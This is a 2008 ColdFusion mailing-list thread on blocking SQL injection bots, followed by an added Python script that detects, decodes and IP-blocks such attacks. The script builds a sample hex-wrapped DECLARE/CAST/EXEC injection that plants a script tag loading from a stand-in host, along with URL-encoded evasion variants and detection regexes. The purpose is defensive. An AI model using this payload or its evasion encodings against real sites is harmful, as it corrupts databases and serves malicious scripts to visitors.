and you're absolutely right, I've gotten two and query params covered it, 
but it sounds like you're getting hit two-pronged.
"If the injection doesn't do something, the brute force attack will"

I'm almost flattered that someone thought my site was important enough 
to attack...

Scott Stewart
ColdFusion Developer

Office of Research Information Systems
Research & Economic Development
University of North Carolina at Chapel Hill

Phone:(919)843-2408
Fax: (919)962-3600
Email: [EMAIL PROTECTED]

Michael Dinowitz wrote:
> Covering the bases with cfqueryparam is one thing, being mobbed is another.
> Sometimes you have to stop these things before any other code is run. I've
> put that abort script at the top of all my application.cfcs just to brute
> force stop the horde.
>
> On Fri, Aug 8, 2008 at 10:31 AM, Scott Stewart <[EMAIL PROTECTED]>wrote:
>
>   
>> Yeah, I've gotten a couple today.. but fortunately when Ray built
>> BlogCFC. he covered his bases.
>>
>> Michael Dinowitz wrote:
>>     
>>> Sorry for the problems with the House of Fusion site. We've been under
>>> massive attack by sql injection bots and I've just been able to get a
>>> handle on it. A fast solution to the problem is this:
>>> <cfif findnocase("';DECLARE", cgi.query_string)><cfabort></cfif>
>>> It works unless you have a few hundred attacks at a time. In that case,
>>> place a cfmail before the abort and send yourself the cgi.remote_addr.
>>> Then block it on the webserver level. It works very well. I've blocked a dozen
>>> IPs and now the site is back to flying.
>
> 
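
Added example, not code from the thread or from BlogCFC: a Python script that replays the procedure Michael describes above, offline, against constructed access-log lines. It applies the posted marker check to the raw query string, applies it again after URL-decoding (the CGI QUERY_STRING is the undecoded string as the web server passed it, so a bot that percent-encodes the apostrophe and semicolon gets past the one-liner as written), decodes the hex blob that this style of injection hides inside CAST(0x... AS VARCHAR) so you can see what it would have executed, and tallies hits per client address into a web-server-level block list, which is the cfmail-then-block step done in bulk. The IP addresses, paths, injected statement, log lines and the three-hit threshold are all constructed for the example.

```python
"""Added example (not from the CF-Talk thread): replay the thread's procedure offline.

1. the marker check Michael's one-liner uses, on the raw query string,
2. the same check after URL-decoding, which the raw check alone misses,
3. decode the statement the bot hides inside CAST(0x... AS VARCHAR),
4. tally attacking IPs from log lines and emit a web-server-level block list.

All IPs, hostnames, paths and log lines below are constructed for the example.
"""
import re
from collections import Counter
from urllib.parse import quote, unquote_plus

# Marker from the posted one-liner: <cfif findnocase("';DECLARE", cgi.query_string)><cfabort></cfif>
MARKER = "';declare"

# Tighter signature for the hex-wrapped form: DECLARE a varchar, SET it from CAST(0x..), EXEC it.
HEX_EXEC_RE = re.compile(
    r"DECLARE\s+@(\w+)\s+N?VARCHAR\(\d+\)\s*;\s*SET\s+@\1\s*=\s*"
    r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR\(\d+\)\)\s*;\s*EXEC\(@\1\)",
    re.IGNORECASE,
)

# Common-log-format line: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')


def raw_check(query_string: str) -> bool:
    """The posted check as-is: case-insensitive substring on the undecoded query string."""
    return MARKER in query_string.lower()


def decoded_check(query_string: str) -> bool:
    """Same marker, but also after one and two rounds of URL-decoding."""
    qs = query_string
    for _ in range(3):          # raw, single-decoded, double-decoded
        if MARKER in qs.lower():
            return True
        qs = unquote_plus(qs)
    return False


def decode_hex_payload(query_string: str):
    """Return the SQL hidden in CAST(0x... AS VARCHAR), or None if the query string lacks that shape."""
    m = HEX_EXEC_RE.search(unquote_plus(unquote_plus(query_string)))
    if not m:
        return None
    return bytes.fromhex(m.group(2)).decode("ascii", errors="replace")


def scan_log(lines, threshold=3):
    """Tally marker hits per client IP; IPs at or above threshold go on the block list."""
    hits, payloads = Counter(), {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = m.group("path").partition("?")[2]
        if not decoded_check(qs):
            continue
        ip = m.group("ip")
        hits[ip] += 1
        sql = decode_hex_payload(qs)
        if sql:
            payloads.setdefault(ip, sql)     # keep the first decoded statement per IP
    block = sorted(ip for ip, n in hits.items() if n >= threshold)
    return hits, block, payloads


def htaccess_deny(ips) -> str:
    """Apache 2.2-style allow/deny lines for the 'block it on the webserver level' step."""
    return "\n".join(["Order Allow,Deny", "Allow from all"] + [f"Deny from {ip}" for ip in ips])


# --- constructed sample data (hypothetical payload, not a real capture) -------
INJECTED_SQL = "UPDATE news SET body=body+'<script src=http://example.invalid/x.js></script>'"
HEX_BLOB = "0x" + INJECTED_SQL.encode("ascii").hex().upper()
INJECTION = f"';DECLARE @S VARCHAR(4000);SET @S=CAST({HEX_BLOB} AS VARCHAR(4000));EXEC(@S);--"

PARTIAL = quote(INJECTION, safe="';=(),@-")   # only spaces encoded: what the raw check catches
FULL = quote(INJECTION, safe="")              # %27%3BDECLARE...: slips past the raw check
DOUBLE = quote(FULL, safe="")                 # %2527%253B...: needs two decodes


def _log(ip, path):
    return f'{ip} - - [08/Aug/2008:10:31:00 -0400] "GET {path} HTTP/1.1" 200 4321'


SAMPLE_LOG = [
    _log("198.51.100.7", "/index.cfm?id=12" + PARTIAL),
    _log("198.51.100.7", "/index.cfm?id=12" + FULL),
    _log("203.0.113.9", "/entry.cfm?entry=7" + FULL),
    _log("203.0.113.9", "/entry.cfm?entry=8" + FULL),
    _log("203.0.113.9", "/entry.cfm?entry=9" + DOUBLE),
    _log("192.0.2.44", "/index.cfm?id=12&mode=declare"),   # benign: the word alone is not the marker
    _log("192.0.2.44", "/search.cfm?q=o%27neil"),          # benign: an apostrophe alone is not the marker
]

if __name__ == "__main__":
    hits, block, payloads = scan_log(SAMPLE_LOG)
    for ip, n in hits.most_common():
        print(f"{ip}: {n} hit(s)" + (f" -> {payloads[ip]!r}" if ip in payloads else ""))
    print(htaccess_deny(block))
```

The second line from 198.51.100.7 is the case to notice: the same statement, fully percent-encoded, passes the raw findnocase check and only trips the decoded one, so a ColdFusion version of the abort should test both the raw query string and its decoded form. The per-IP counter is just the cgi.remote_addr mail step aggregated, which is what you want once the attacks arrive a few hundred at a time.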


Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:310515